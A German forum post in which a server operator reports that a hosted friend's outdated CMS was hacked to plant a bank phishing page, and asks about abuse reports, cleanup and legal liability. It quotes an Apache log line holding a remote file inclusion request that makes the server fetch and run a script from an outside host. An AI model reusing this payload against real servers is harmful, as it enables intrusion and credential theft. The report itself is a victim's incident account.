hab vorhin eine Mail von der 1&1 Abuse-Abteilung bekommen. (hab meinen Server bei 1&1 stehen)
Auf einer Seite eines Freundes, die bei mir gehostet wird, wurde eine Phishing Seite (Login-Seite von "Canada Trust") installiert.
Ausgenutzt wurde eine seit 2005 bekannte Lücke in einem CMS, das er auf seinem Webspace installiert hat. (angeblich hat er die neueste Version drauf ... das muss ich später noch mal in Ruhe prüfen)
"Installiert" wurde das Ganze heute morgen so zwischen 08:30 und 09:05. Ich habe in diesem Zeitraum eine Menge Einträge im Apache Logfile und auch einige Dateien, die zu der Phishing Seite gehören, wurden in diesem Zeitraum erstellt.
82.128.18.187 - - [25/Feb/2008:08:34:17 +0100] "GET //index.php?option=com_expos
e&Itemid=&mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/cont
ent/rfi.txt? HTTP/1.1" 200 5603 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en
-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
http://www.citoyennete-active.org/mambo ... nt/rfi.txt <-- dieses Script wurde anscheinend auf meinem Server ausgeführt ... habs mir noch nicht komplett angeschaut - wenn jemand Lust hat kann er ja mal schauen ob er was damit anfangen kann. ;)
Die gesnifften Zugangsdaten gehen per Mail an "djgame1983@gmail.com" und "manager_employ@sify.com" Hat es Sinn da irgendwas zu unternehmen bezüglich Abuse-Meldung oder so?
Hab schon nach anderen Dateien gesucht, die in diesem Zeitrum erstellt/geändert wurden, aber nichts gefunden. Rein theoretisch müsste ich meinen Server trotzdem komplett neu installieren, um auf Nummer sicher zu gehen ...
Wie ist das eigentlich rechtlich? Ist man als Serverbetreiber verpflichtet, bei allen seinen Usern jede einzelne Datei regelmässig anzuschauen und zu prüfen ob da irgendwelche Sicherheitslöcher sind?
Wer übernimmt die Haftung wenn es zu finanziellen Schäden kommt? (z.Bsp. durch ausgehende DoS-Angriffe)
Grüße
DukePyrolator
